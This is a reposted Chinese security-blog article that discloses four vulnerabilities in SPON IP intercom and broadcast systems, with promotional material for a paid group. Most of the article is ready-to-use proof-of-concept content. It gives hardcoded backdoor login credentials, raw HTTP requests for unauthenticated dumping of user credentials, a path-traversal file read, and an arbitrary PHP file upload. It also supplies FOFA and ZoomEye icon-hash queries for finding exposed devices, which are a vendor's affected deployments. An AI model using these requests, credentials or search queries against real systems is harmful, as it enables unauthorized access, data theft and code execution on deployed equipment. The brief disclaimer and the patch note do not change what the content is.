4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】
2024-1-11 09:42:2 Author: 棉花糖网络安全圈(查看原文) 阅读量:23 收藏

最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:

给公众号设为星标

点我加入交流群获得第一时间更新通知
防失联+棉花糖私人公众号

棉花糖博客地址

www.mhtsec.com
近期更新教程
2023 8月版黑马JAVA线下就业班
安卓App安全测试入门教程
移步博客获取下载链接

文章中涉及的漏洞均已修复,敏感信息已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。

漏洞详情

01

七个世邦通信SPON IP网络对讲广播系统漏洞

界面截图

02

漏洞复现

03

1、存在后门账户

账号:administrator密码:800823

登录:

2、未授权访问

POST /php/getuserdata.php HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: empty04825Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
jsondata[pageIndex]=0&jsondata[pageCount]=30

回显:

可使用回显账号密码登录web

3、exportrecord.php 任意文件读取漏洞

GET /php/exportrecord.php?downtype=10&downname=C:\\xxdd.txt\\..\\Windows\\win.ini HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9

回显:

4、uploadjson.php任意文件上传漏洞

POST /php/uploadjson.php HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
jsondata[filename]=mht.php&jsondata[data]=<?php echo 'mht';?>

回显:

访问上传地址

/lan/mht.php

语法

zoomeye:

04

iconhash:"-1830859634"

fofa:

icon_hash="-1830859634"

修复建议

05

官方已发布补丁

打个广告

人太懒

放在这里一大篇也让大家心烦

有兴趣自己点开看吧👇

付费群介绍

END

那么又到了文末我们应该?

1、关注!点赞!转发!

2、点我查看付费群介绍!

3、封面获取请后台回复:20240111封面


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247501055&idx=1&sn=47774c3b4b0d5d6882527c8d992dfedd&chksm=c1cb3cc6f57d1f54582741ebb3f45bd565538a8d71f1a067708d10becab39d17e0402714c5e2&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh